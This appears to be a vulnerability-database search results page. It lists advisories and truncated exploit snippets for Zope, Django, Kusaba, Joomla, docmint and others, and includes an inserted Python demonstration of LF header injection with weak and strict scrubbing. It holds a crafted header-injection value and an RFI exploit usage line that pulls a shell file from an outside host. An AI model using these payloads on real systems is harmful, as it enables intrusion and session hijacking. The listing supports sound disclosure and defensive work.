
57 matches found

Github Security Blog
added 2018/07/23 7:51 p.m. · 25 views

HTTP header injection in Plone and Zope2

ZPublisher.HTTPRequest.scrubHeader in Zope 2 before 2.13.19, as used in Plone before 4.3 beta 1, allows remote attackers to inject arbitrary HTTP headers via a linefeed LF character...

CVSS 6.4 · AI score 5.3 · EPSS 0.00821
Exploits 0 · References 12 · Affected software 2

WPVulnDB
added 2017/04/20 12:00 a.m. · 15 views

WooCommerce Catalog Enquiry - Arbitrary File Upload

Email from user: "A 'fix' for the file upload vulnerability seems to have been introduced in version 3.0.2 with the cryptic description "Fixed some data issues." However I hope you're aware that the vulnerability still exists and can be exploited by simply changing Content-Type in the HTTP reques...

CVSS 5 · AI score 1.5 · EPSS 0.00282
Exploits 0 · References 1 · Affected software 1

OSV
added 2014/09/30 2:55 p.m. · 16 views

PYSEC-2014-73

ZPublisher.HTTPRequest.scrubHeader in Zope 2 before 2.13.19, as used in Plone before 4.3 beta 1, allows remote attackers to inject arbitrary HTTP headers via a linefeed LF character...

CVSS 6.4 · AI score 5.5 · EPSS 0.00821
Exploits 0 · References 6

seebug.org
added 2014/07/01 12:00 a.m. · 15 views

Kusaba <= 1.0.4 - Remote Code Execution Exploit

No description provided by source. <?php /* 9 Oct 2008 Kusaba <= 1.0.4 Remote Code Execution Sausage [email protected] After execution: http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print Hello; http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello */ $shellname =...

AI score 7.1
Exploits 0

Packet Storm
added 2013/08/14 12:00 a.m. · 32 views

Intrasrv 1.0 Buffer Overflow

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 "Intrasrv 1.0 Buff...

AI score 0.9
Exploits 0

NVD
added 2012/11/18 11:55 p.m. · 18 views

CVE-2012-4520

The django.http.HttpRequest.get_host function in Django 1.3.x before 1.3.4 and 1.4.x before 1.4.2 allows remote attackers to generate and display arbitrary URLs via crafted username and password Host header values...

CVSS 6.4 · AI score 6.6 · EPSS 0.03893
Exploits 1 · References 17

OSV
added 2012/11/18 11:55 p.m. · 25 views

PYSEC-2012-7

The django.http.HttpRequest.get_host function in Django 1.3.x before 1.3.4 and 1.4.x before 1.4.2 allows remote attackers to generate and display arbitrary URLs via crafted username and password Host header values...

CVSS 6.4 · AI score 5.9 · EPSS 0.03893
Exploits 1 · References 17

Cvelist
added 2012/11/18 11:00 p.m. · 20 views

CVE-2012-4520

The django.http.HttpRequest.get_host function in Django 1.3.x before 1.3.4 and 1.4.x before 1.4.2 allows remote attackers to generate and display arbitrary URLs via crafted username and password Host header values...

AI score 6.5 · EPSS 0.03893
Exploits 1 · References 17

CVE
added 2012/11/18 11:00 p.m. · 91 views

CVE-2012-4520

CVE-2012-4520 concerns Django’s http.HttpRequest.get_host, where Django 1.3.x before 1.3.4 and 1.4.x before 1.4.2 can be exploited by crafting the Host header to cause the application to display arbitrary URLs, potentially impacting views such as password resets. The vulnerability is described ac...

CVSS 6.4 · AI score 6.6 · EPSS 0.03893
Exploits 1 · References 17 · Affected software 1

Debian CVE
added 2012/11/18 11:00 p.m. · 29 views

CVE-2012-4520

The django.http.HttpRequest.get_host function in Django 1.3.x before 1.3.4 and 1.4.x before 1.4.2 allows remote attackers to generate and display arbitrary URLs via crafted username and password Host header values...

CVSS 6.4 · AI score 6.6 · EPSS 0.03893
Exploits 1

0day.today
added 2012/10/17 12:00 a.m. · 16 views

Joomla Component com_commedia SQL Injection Exploit

Commedia - a component and content plugin that allows you to create a content table containing all of the MP3s that are present in any directory of your site, a FTP-server folder, single path to ftp-file or a HTTPS-server DROPBOX, folder, single path to http-file or http-radio Exploit Title:...

AI score 6.8
Exploits 0

Metasploit
added 2012/06/27 8:21 a.m. · 36 views

Atlassian Crowd XML Entity Expansion Remote File Access

This module simply attempts to read a remote file from the server using a vulnerability in the way Atlassian Crowd handles XML files. The vulnerability occurs while trying to expand external entities with the SYSTEM identifier. This module has been tested successfully on Linux and Windows...

CVSS 9.1 · AI score 6.7 · EPSS 0.64534
Exploits 3

exploitpack
added 2011/02/16 12:00 a.m. · 34 views

Ruby on Rails 3.0.5 - WEBrick::HTTPRequest Module HTTP Header Injection

Ruby on Rails 3.0.5 - WEBrick::HTTPRequest Module HTTP Header Injection source: https://www.securityfocus.com/bid/46423/info Ruby on Rails is prone to a vulnerability that allows attackers to inject arbitrary content into the 'X-Forwarded-For', 'X-Forwarded-Host' and 'X-Forwarded-Server' HTTP...

AI score 7.8
Exploits 0

Packet Storm
added 2010/03/22 12:00 a.m. · 16 views

phpAuthentAdmin Cross Site Scripting

#!/usr/bin/perl Autor: Yoyahack Web: http://undersecurity.net Gretz: OzX, p0fk, SeC, ksha, seth, champloo, SH4V.... use LWP::UserAgent; use HTTP::Request::Common; Source print q--------------------------------- Autor: Yoyahack Web: http://undersecurity.net Gretz: OzX, p0fk, SeC, ksha, seth,...

AI score 0.5
Exploits 0

seebug.org
added 2008/12/10 12:00 a.m. · 12 views

eZ Publish < 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit

No description provided by source. <?php /* eZ Publish privilege escalation exploit by s4avrd0w [email protected] Versions affected = 3.5.6 Resolved in 3.9.5, 3.10.1, 4.0.1 More info:...

AI score 7.1
Exploits 0

securityvulns
added 2007/06/25 12:00 a.m. · 47 views

[Full-disclosure] Safari XMLHttpRequest HTTP header injection

Westpoint Security Advisory --------------------------- Title: Safari XMLHttpRequest HTTP header injection Risk Rating: Low Platforms: MacOS and Windows Author: Richard Moore [email protected] Date: 25 June 2007 Advisory ID: wp-07-0002 URL: http://www.westpoint.ltd.uk/advisories/wp-07-0002.tx...

CVSS 4.3 · AI score 1.3 · EPSS 0.03389
Exploits 1

Exploit DB
added 2006/10/09 12:00 a.m. · 32 views
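Three results in this listing are the same bug class: the Zope/Plone `scrubHeader` entry (arbitrary headers via a bare LF), the Rails/WEBrick `X-Forwarded-*` injection and the Safari `XMLHttpRequest` header injection. The added example below (written for this page, not code from Zope, WEBrick or any advisory) shows why a bare LF is enough: a scrubber that only removes the CRLF pair leaves `\n` in place, and a lenient parser that accepts LF as a line terminator sees a second header. The `INJECTED` value, the header-rendering helper and the parser are constructed for the demonstration.

```python
import re

# Constructed attacker-controlled value (not from any advisory): a token
# followed by a bare LF and a second header line.
INJECTED = "deadbeef\nSet-Cookie: session=attacker"


def scrub_header_weak(value: str) -> str:
    """Illustrative weak scrubber: strips only the CRLF pair, so a bare LF
    survives. This is the shape of bug the Zope entry describes."""
    return value.replace("\r\n", "")


def scrub_header_strict(value: str) -> str:
    """Strip every CR and LF regardless of pairing (or reject the value)."""
    return re.sub(r"[\r\n]", "", value)


def render_response_headers(location: str, scrub) -> bytes:
    """Hypothetical handler: builds a redirect whose Location carries user input."""
    lines = [
        "HTTP/1.1 302 Found",
        f"Location: /items/{scrub(location)}",
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def split_header_lines(raw: bytes) -> list:
    """Parse the way many lenient clients and proxies do: a bare LF ends a line."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    return [ln.rstrip("\r") for ln in head.split("\n")]


def injected_header_count(scrub) -> int:
    """How many Set-Cookie headers the lenient parser sees after scrubbing."""
    lines = split_header_lines(render_response_headers(INJECTED, scrub))
    return sum(1 for ln in lines if ln.lower().startswith("set-cookie:"))


if __name__ == "__main__":
    print("weak scrubber, injected headers:", injected_header_count(scrub_header_weak))
    print("strict scrubber, injected headers:", injected_header_count(scrub_header_strict))
```

The same check applies on the client side: any API that lets script set a request header (the Safari result) or any proxy that copies client values into `X-Forwarded-*` (the WEBrick result) has to refuse both `\r` and `\n`, not just the pair.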

docmint 2.0 - '/engine/require.php' Remote File Inclusion

#!/usr/bin/perl docmint perl docmint.pl http://target.com/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; Greetz: My Dearest Wife - ping, echo|staff y3dips,theday,moby,comex,z3r0byt3,c-a-s-e,Sto,lirva32,negative, SinChan, sakitjiwa, maSter-oP, mrny3m, bithedz, lieur-eu...

AI score 7.4
Exploits 0